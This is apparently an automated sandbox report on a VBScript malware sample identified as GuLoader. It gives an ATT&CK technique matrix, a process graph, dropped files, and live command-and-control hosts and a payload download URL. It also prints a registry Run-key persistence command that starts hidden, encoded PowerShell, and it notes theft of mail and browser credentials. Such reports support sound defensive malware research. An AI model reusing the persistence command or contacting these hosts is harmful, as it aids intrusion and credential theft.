            Valid AccountsScripting221DLL Side-Loading1DLL Side-Loading1Deobfuscate/Decode Files or Information11OS Credential Dumping1File and Directory Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsCommand and Scripting Interpreter11Registry Run Keys / Startup Folder21Process Injection13Scripting221LSASS MemorySystem Information Discovery25Remote Desktop ProtocolMan in the Browser1Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsPowerShell3Logon Script (Windows)Registry Run Keys / Startup Folder21Obfuscated Files or Information3Security Account ManagerQuery Registry1SMB/Windows Admin SharesData from Local System1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)DLL Side-Loading1NTDSSecurity Software Discovery321Distributed Component Object ModelEmail Collection1Scheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading1LSA SecretsProcess Discovery2SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol212Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion241Cached Domain CredentialsVirtualization/Sandbox Evasion241VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection13DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 528495 Sample: DETAILS.vbs Startdate: 25/11/2021 Architecture: WINDOWS Score: 100 59 septnet.duckdns.org 2->59 75 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->75 77 Found malware configuration 2->77 79 Yara detected GuLoader 2->79 81 7 other signatures 2->81 9 wscript.exe 2 2->9         started        12 powershell.exe 14 2->12         started        14 powershell.exe 15 2->14         started        signatures3 process4 signatures5 83 Suspicious powershell command line found 9->83 85 Wscript starts Powershell (via cmd or directly) 9->85 87 Very long command line found 9->87 16 powershell.exe 24 9->16         started        20 powershell.exe 9->20         started        22 conhost.exe 9->22         started        89 Encrypted powershell cmdline option found 12->89 24 powershell.exe 12->24         started        26 conhost.exe 12->26         started        process6 file7 51 C:\Users\user\AppData\...\mla4kvb3.cmdline, UTF-8 16->51 dropped 65 Suspicious powershell command line found 16->65 67 Very long command line found 16->67 69 Encrypted powershell cmdline option found 16->69 28 ieinstal.exe 4 6 16->28         started        32 csc.exe 3 16->32         started        35 conhost.exe 16->35         started        71 Tries to detect Any.run 20->71 73 Hides threads from debuggers 20->73 37 ieinstal.exe 20->37         started        39 csc.exe 20->39         started        41 ieinstal.exe 24->41         started        43 csc.exe 24->43         started        signatures8 process9 dnsIp10 61 septnet.duckdns.org 193.104.197.85, 49806, 6577 TELIANETTeliaCarrierEU unknown 28->61 63 103.167.84.150, 49805, 49808, 49810 AARNET-AS-APAustralianAcademicandResearchNetworkAARNe unknown 28->63 91 Tries to steal Mail credentials (via file / registry access) 28->91 93 Creates autostart registry keys with suspicious values (likely registry only malware) 28->93 95 Creates an autostart registry key pointing to binary in C:\Windows 28->95 97 Tries to harvest and steal browser information (history, passwords, etc) 28->97 53 C:\Users\user\AppData\Local\...\mla4kvb3.dll, PE32 32->53 dropped 45 cvtres.exe 1 32->45         started        99 Tries to detect Any.run 37->99 101 Hides threads from debuggers 37->101 55 C:\Users\user\AppData\Local\...\uotckr0j.dll, PE32 39->55 dropped 47 cvtres.exe 39->47         started        57 C:\Users\user\AppData\Local\...\vybs2gqu.dll, PE32 43->57 dropped 49 cvtres.exe 43->49         started        file11 signatures12 process13

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            No Antivirus matches

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://103.167.84.150/mconta/Host_DwUbTLydN243.binhttp://103.167.84.150/bconta/Host_DwUbTLydN243.bin0%Avira URL Cloudsafe
            http://103.167.84.150/mconta/Host_DwUbTLydN243.bin0%Avira URL Cloudsafe
            http://103.167.84.150/mconta/Host_DwUbTLydN243.bins0%Avira URL Cloudsafe
            http://103.167.84.150/0%Avira URL Cloudsafe
            http://103.167.84.150/mconta/Host_DwUbTLydN243.binO0%Avira URL Cloudsafe
            http://pesterbdd.com/images/Pester.png0%Avira URL Cloudsafe
            http://103.167.84.150/mconta/Host_DwUbTLydN243.bin-0%Avira URL Cloudsafe
            http://103.167.84.150/mconta/Host_DwUbTLydN243.bin)0%Avira URL Cloudsafe
            https://contoso.com/0%Avira URL Cloudsafe
            https://contoso.com/License0%Avira URL Cloudsafe
            https://contoso.com/Icon0%Avira URL Cloudsafe
            http://103.167.84.150/mconta/Host_DwUbTLydN243.binE0%Avira URL Cloudsafe
            http://103.167.84.150/mconta/Host_DwUbTLydN243.bind0%Avira URL Cloudsafe
            http://103.167.84.150/mconta/Host_DwUbTLydN243.bina8;0%Avira URL Cloudsafe
            http://103.167.84.150/bconta/Host_DwUbTLydN243.bin0%Avira URL Cloudsafe
            http://crl.micr0%Avira URL Cloudsafe
            http://103.167.84.150/mconta/Host_DwUbTLydN243.binU.s0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            septnet.duckdns.org
            193.104.197.85
            truetrue
              unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://103.167.84.150/mconta/Host_DwUbTLydN243.bintrue
              • Avira URL Cloud: safe
              unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://103.167.84.150/mconta/Host_DwUbTLydN243.binhttp://103.167.84.150/bconta/Host_DwUbTLydN243.binieinstal.exe, 00000007.00000002.16981282399.0000000003320000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000002.16197752845.0000000003110000.00000004.00000001.sdmp, ieinstal.exe, 00000014.00000002.16339742625.0000000004CF0000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://103.167.84.150/mconta/Host_DwUbTLydN243.binsieinstal.exe, 00000014.00000002.16336884537.00000000032E8000.00000004.00000020.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.15274992717.0000000005E8F000.00000004.00000001.sdmpfalse
                high
                http://103.167.84.150/ieinstal.exe, 00000013.00000002.16196308559.0000000002ED0000.00000004.00000020.sdmp, ieinstal.exe, 00000014.00000002.16336884537.00000000032E8000.00000004.00000020.sdmptrue
                • Avira URL Cloud: safe
                unknown
                http://103.167.84.150/mconta/Host_DwUbTLydN243.binOieinstal.exe, 00000007.00000002.16980426643.0000000003159000.00000004.00000020.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.15262680896.0000000004F79000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://103.167.84.150/mconta/Host_DwUbTLydN243.bin-ieinstal.exe, 00000014.00000002.16336303615.00000000032CA000.00000004.00000020.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.15262680896.0000000004F79000.00000004.00000001.sdmpfalse
                  high
                  http://103.167.84.150/mconta/Host_DwUbTLydN243.bin)ieinstal.exe, 00000014.00000002.16336884537.00000000032E8000.00000004.00000020.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://contoso.com/powershell.exe, 00000003.00000002.15274992717.0000000005E8F000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.15274992717.0000000005E8F000.00000004.00000001.sdmpfalse
                    high
                    https://contoso.com/Licensepowershell.exe, 00000003.00000002.15274992717.0000000005E8F000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://contoso.com/Iconpowershell.exe, 00000003.00000002.15274992717.0000000005E8F000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://103.167.84.150/mconta/Host_DwUbTLydN243.binEieinstal.exe, 00000014.00000002.16336884537.00000000032E8000.00000004.00000020.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://103.167.84.150/mconta/Host_DwUbTLydN243.bindieinstal.exe, 00000013.00000002.16196308559.0000000002ED0000.00000004.00000020.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://103.167.84.150/mconta/Host_DwUbTLydN243.bina8;ieinstal.exe, 00000013.00000002.16195282460.0000000002E88000.00000004.00000020.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://103.167.84.150/bconta/Host_DwUbTLydN243.binieinstal.exe, 00000007.00000002.16981282399.0000000003320000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000002.16197752845.0000000003110000.00000004.00000001.sdmp, ieinstal.exe, 00000014.00000002.16339742625.0000000004CF0000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://crl.micrpowershell.exe, 0000000E.00000002.16332582350.0000000000C38000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.15261074930.0000000004E21000.00000004.00000001.sdmp, powershell.exe, 00000009.00000002.16412756099.0000000004D31000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.16202623594.0000000004A81000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.16345107555.0000000004C21000.00000004.00000001.sdmpfalse
                      high
                      https://aka.ms/pscore6lBpmpowershell.exe, 00000003.00000002.15261074930.0000000004E21000.00000004.00000001.sdmp, powershell.exe, 00000009.00000002.16412756099.0000000004D31000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.16202623594.0000000004A81000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.16345107555.0000000004C21000.00000004.00000001.sdmpfalse
                        high
                        https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.15262680896.0000000004F79000.00000004.00000001.sdmpfalse
                          high
                          http://103.167.84.150/mconta/Host_DwUbTLydN243.binU.sieinstal.exe, 00000013.00000002.16195282460.0000000002E88000.00000004.00000020.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown

                          Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public

                          IPDomainCountryFlagASNASN NameMalicious
                          103.167.84.150
                          unknownunknown
                          7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNetrue
                          193.104.197.85
                          septnet.duckdns.orgunknown
                          1299TELIANETTeliaCarrierEUtrue

                          General Information

                          Joe Sandbox Version:34.0.0 Boulder Opal
                          Analysis ID:528495
                          Start date:25.11.2021
                          Start time:11:23:37
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 15m 28s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Sample file name:DETAILS.vbs
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                          Number of analysed new started processes analysed:22
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winVBS@30/40@1/2
                          EGA Information:
                          • Successful, ratio: 100%
                          HDC Information:Failed
                          HCA Information:
                          • Successful, ratio: 99%
                          • Number of executed functions: 300
                          • Number of non-executed functions: 16
                          Cookbook Comments:
                          • Adjust boot time
                          • Enable AMSI
                          • Found application associated with file extension: .vbs
                          • Override analysis time to 240s for JS/VBS files not yet terminated
                          Warnings:
                          Show All
                          • Exclude process from analysis (whitelisted): dllhost.exe, backgroundTaskHost.exe
                          • Excluded IPs from analysis (whitelisted): 20.82.207.122
                          • Excluded domains from analysis (whitelisted): www.bing.com, wdcpalt.microsoft.com, wd-prod-cp-eu-north-2-fe.northeurope.cloudapp.azure.com, wdcp.microsoft.com, nexusrules.officeapps.live.com, wd-prod-cp.trafficmanager.net
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size exceeded maximum capacity and may have missing disassembly code.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          11:25:51API Interceptor169x Sleep call for process: powershell.exe modified
                          11:26:35AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Deathwe2 c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $discommo=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Nydelsesmi;powershell.exe -windowstyle hidden -encodedcommand($discommo)
                          11:26:43AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Deathwe2 c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $discommo=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Nydelsesmi;powershell.exe -windowstyle hidden -encodedcommand($discommo)

                          Joe Sandbox View / Context

                          IPs

                          No context

                          Domains

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          septnet.duckdns.orgnSHIPPING-ADVISE_SHIPMENT-INFORMATION_3814147541--Delivery_OCTOBER28-2021.vbsGet hashmaliciousBrowse
                          • 193.104.197.31
                          DHL+Shipment+Notification_3814110941--Delivery_OCTOBER27-2021.exeGet hashmaliciousBrowse
                          • 193.104.197.43
                          Arrival_Notice-AutonotificationimportsEUR-sealandmaersk.com_october2021.vbsGet hashmaliciousBrowse
                          • 193.104.197.90
                          DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeGet hashmaliciousBrowse
                          • 193.104.197.28

                          ASN

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          TELIANETTeliaCarrierEU6L1AGNUMgkGet hashmaliciousBrowse
                          • 178.76.5.165
                          mfFr814HupGet hashmaliciousBrowse
                          • 178.76.5.184
                          xE9RTUBg8VGet hashmaliciousBrowse
                          • 178.76.5.196
                          armGet hashmaliciousBrowse
                          • 178.76.5.179
                          VUUGP65515Get hashmaliciousBrowse
                          • 209.170.88.180
                          wAs4FSRG7sGet hashmaliciousBrowse
                          • 178.76.5.191
                          d8Hs7X8HGPGet hashmaliciousBrowse
                          • 217.212.229.224
                          uRQVqbl0sQGet hashmaliciousBrowse
                          • 104.123.190.215
                          RrK5IgZ6gZGet hashmaliciousBrowse
                          • 213.155.129.253
                          tDfXtXb4OzGet hashmaliciousBrowse
                          • 178.76.5.130
                          p9rySh9WA4Get hashmaliciousBrowse
                          • 178.72.31.135
                          xd.x86Get hashmaliciousBrowse
                          • 209.95.144.130
                          3Htna329pCGet hashmaliciousBrowse
                          • 80.239.196.165
                          rArrival_Notice_213674204_ref_00D0Nk6PC_5005p2WPHZn_ref-213674204.vbsGet hashmaliciousBrowse
                          • 193.104.197.81
                          nSHIPPING-ADVISE_SHIPMENT-INFORMATION_3814147541--Delivery_OCTOBER28-2021.vbsGet hashmaliciousBrowse
                          • 193.104.197.31
                          DHL+Shipment+Notification_3814110941--Delivery_OCTOBER27-2021.exeGet hashmaliciousBrowse
                          • 193.104.197.43
                          DHL_Shipment-Notification-2166598383-Notification-XXXXXMSG0073728273736_OCTOBER22-2021.exeGet hashmaliciousBrowse
                          • 193.104.197.94
                          DPJPYxGxfIGet hashmaliciousBrowse
                          • 178.76.5.134
                          Z1JWqe0tZnGet hashmaliciousBrowse
                          • 209.170.88.133
                          DGTm0edISXGet hashmaliciousBrowse
                          • 213.248.71.55
                          AARNET-AS-APAustralianAcademicandResearchNetworkAARNe20211125 CIRCULAR ANULACION CUENTA BANCARIA BANKIA.xlsxGet hashmaliciousBrowse
                          • 103.167.92.73
                          meerkat.x86Get hashmaliciousBrowse
                          • 103.160.46.142
                          oQANZnrt9dGet hashmaliciousBrowse
                          • 103.163.1.44
                          y8CYO3E0MFGet hashmaliciousBrowse
                          • 130.222.22.174
                          RFQ_PO-330758290144.xlsxGet hashmaliciousBrowse
                          • 103.167.92.57
                          PROFORMA INVOICE.xlsxGet hashmaliciousBrowse
                          • 103.171.1.140
                          NQsLN1nOONGet hashmaliciousBrowse
                          • 103.170.35.74
                          ANT_0402205_001_144747_20211117.xlsxGet hashmaliciousBrowse
                          • 103.167.92.73
                          IAENMAI.xlsxGet hashmaliciousBrowse
                          • 103.167.90.66
                          IAENMAI.xlsxGet hashmaliciousBrowse
                          • 103.167.90.66
                          psI4iJBgiAGet hashmaliciousBrowse
                          • 138.7.41.139
                          sora.arm-20211123-2050Get hashmaliciousBrowse
                          • 103.181.193.3
                          20212311.xlsxGet hashmaliciousBrowse
                          • 103.171.1.219
                          justificantes anticipos.xlsxGet hashmaliciousBrowse
                          • 103.167.90.66
                          20211118 CIRCULAR ANULACION CUENTA BANCARIA BANKIA.xlsxGet hashmaliciousBrowse
                          • 103.167.92.73
                          0416ORTX20497421.xlsxGet hashmaliciousBrowse
                          • 103.171.1.140
                          Purchase Order 367465636.xlsxGet hashmaliciousBrowse
                          • 103.167.92.57
                          mips-20211123-0942Get hashmaliciousBrowse
                          • 103.172.251.7
                          FICHERO 1.xlsxGet hashmaliciousBrowse
                          • 103.167.92.73
                          PRESUPUESTO.xlsxGet hashmaliciousBrowse
                          • 103.167.90.66

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          No context

                          Created / dropped Files

                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):8003
                          Entropy (8bit):4.841989710132343
                          Encrypted:false
                          SSDEEP:192:Qxoe5GVsm5emddVFn3eGOVpN6K3bkkjo5dgkjDt4iWN3yBGHD9smqdcU6C5pOWik:7hVoGIpN6KQkj22kjh4iUxgrib4J
                          MD5:677C4E3A07935751EA3B092A5E23232F
                          SHA1:0BB391E66C6AE586907E9A8F1EE6CA114ACE02CD
                          SHA-256:D05D82E08469946C832D1493FA05D9E44926911DB96A89B76C2A32AC1CBC931F
                          SHA-512:253BCC6033980157395016038E22D3A49B0FA40AEE18CC852065423BEF773BF000EAAEB0809D0B9C4E167883288B05BA168AF0A756D6B74852778EAAA30055C2
                          Malicious:false
                          Preview: PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):15924
                          Entropy (8bit):5.580048003212767
                          Encrypted:false
                          SSDEEP:384:dugUWHIBDEJTJ7qCF+zqcFV3m3Yjf9inRmy9P7eMbMIcZhi:fSIJTJrcFV3Lf9Ji7z4dE
                          MD5:E9D180387566A7C92C0BDEC6BEA1F9D7
                          SHA1:8894659A987087AC1F82A1DE2ABB560A30C230F2
                          SHA-256:93CBCE0A9C09040402D4869F9C99B93F23042FF2F5245CBB2D4287A814AC75A4
                          SHA-512:9BCE1181120DD01DC7A63FF5CD6B777148D1D925B7D7AD651A107905342A14347A4324B3B068BF31695E766C4D9101DC62BA6C8281FFF76D9B8E8EF115FD1597
                          Malicious:false
                          Preview: @...e...........V.....................<.4............@..........H...............o..b~.D.poM...2..... .Microsoft.PowerShell.ConsoleHostD................g$H..K..I.............System.Management.Automation4...............-..Q...H..g............System.Core.0..................)W_tD...B..T.........System..4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.@...............8Ak....G.......j........System.DirectoryServices<.................YS.eE..9.G...........System.Management...4...................2.8F.....S.".......System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementD....................+.H..!...e........System.Configuration.Ins
                          C:\Users\user\AppData\Local\Temp\CSC3851A02150B343D6B4C9C6BEA8107533.TMP
                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                          File Type:MSVC .res
                          Category:dropped
                          Size (bytes):652
                          Entropy (8bit):3.1059000734993276
                          Encrypted:false
                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryuak7YnqqsPN5Dlq5J:+RI+ycuZhNQakSsPNnqX
                          MD5:92113DEFF8010060EFCFCD627165FC3C
                          SHA1:99A7AEBA0281A065FE3566293075E107BE686259
                          SHA-256:5B2AF0F88656C15EC4806F94282B57EF392DC6279EC68C15FE132A51F8D083DC
                          SHA-512:5B0DC9105913E4CEFD21B38C73E79D575510ECF5F34EA6B69C392A90A6CF322817BBC6CA58DF025D026CF64A8610F11E26DB09C56E021DA26F8D85CCBF3D2CA7
                          Malicious:false
                          Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...m.l.a.4.k.v.b.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.l.a.4.k.v.b.3...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                          C:\Users\user\AppData\Local\Temp\CSC77023F4354E6477E97855CB603CA0.TMP
                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                          File Type:MSVC .res
                          Category:dropped
                          Size (bytes):652
                          Entropy (8bit):3.092304031247258
                          Encrypted:false
                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grydqak7YnqqmbPN5Dlq5J:+RI+ycuZhNHqakSmbPNnqX
                          MD5:576649428FED419E0039705E8778C7D1
                          SHA1:6789EDF06B9F97B5ABD64047DF8350D4FCED96D1
                          SHA-256:3EADCEB6B1258CB8DBBCAB46496EC78E7C78C7BA8DBB29F1F710884FC9BF356D
                          SHA-512:2D1CA4C9185E78D1F3F7DB915D15CADD67D07FF674E08ABA9F178BB8C15EA20B2D3718CC9B47B36439871178DDBE5EC29EA24A825D3EC30514773D8B587DA88E
                          Malicious:false
                          Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...u.o.t.c.k.r.0.j...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...u.o.t.c.k.r.0.j...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                          C:\Users\user\AppData\Local\Temp\CSC9CB81DB86B7E400B9F74BAF89293FF3.TMP
                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                          File Type:MSVC .res
                          Category:dropped
                          Size (bytes):652
                          Entropy (8bit):3.1158438080385094
                          Encrypted:false
                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryR3xak7Ynqq632PN5Dlq5J:+RI+ycuZhN7BakS6mPNnqX
                          MD5:260825ADB1CEEA1232E54FD137F1E6EF
                          SHA1:5F7449FC3DBB41B5A445BF224F5683F7D50A4B9E
                          SHA-256:D37186C9DF5281569FD30096388105EB522C1EAB9FE652942FA95279F7BC286E
                          SHA-512:698910B47B5CEF69B8FA67F7419F98210FC9A3882F9257BDA8E2727774FA5E56AC4068976F4FE1892D1D39E3FBDBFB6E224F224BD5E1413BD8B390A81ED092BB
                          Malicious:false
                          Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...v.y.b.s.2.g.q.u...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...v.y.b.s.2.g.q.u...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                          C:\Users\user\AppData\Local\Temp\Depopulato2.dat
                          Process:C:\Windows\System32\wscript.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):48258
                          Entropy (8bit):6.8580638642234435
                          Encrypted:false
                          SSDEEP:768:UC5K/L9xmjBs6YEjfAX4IS75qElIA/IMigzaatw129/bI/38ylwL:USKD9xmjq6YafaSNTO2WEaa21SUhw
                          MD5:65BDF68258059B5C43500D38DE5B1C59
                          SHA1:55E6A04CADFABFD174EE57D16A5A4CA774A05505
                          SHA-256:5F303FA60234AADB076730D999B8897247A0F62659147CE7B5030ECBEBDB7FE9
                          SHA-512:1222847DB3471C945D9526572E741D49A976775192DE5F4D28577A663F2A2AA27399C50A1482D0875921416547A59CDB839B2B410AE9F750726911AB0033A812
                          Malicious:false
                          Preview: ........2....kt2b.....~..9.;.Q..2...Z.._1..4.H.......9.u.W...........H.y I.Y.`...Ph.".\L..#..1.. m3.yuc.O@B.;B.Q......F..%...}&54<p.(....S1....I./O..:...`..=..vx.).w....t*....r......j...y I.Y.`...Ph.".\L..#..1.. m3.yuc.O@B.;B.Q......F..%...}&54<p.(....S1....I./O..:...`..=..vx.).w....t*....r......j.....H...^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^..^.......k..#k....Ls.$......Z..ir[M.....?......Y..rCM......g..~.....s.)..v...e..n.k.@z.p.4k....H...p...H........k...zD.H....,"op.c~.a.k...~..2.@U..=.v,..r.H.8..k...!.W..To|1.\.[r.lL.dK.2.H...i....w.H.xc.....s...nbH.zkh.....:..j.. ..>..o|1..+A.......wn...oL1O......g.H....X.TT.....k...bH.z.`,0k.....$.rz..bH.zk.....F.HMv7....H.z)..N.I..I.F&H.......Q.
                          C:\Users\user\AppData\Local\Temp\RES34E6.tmp
                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
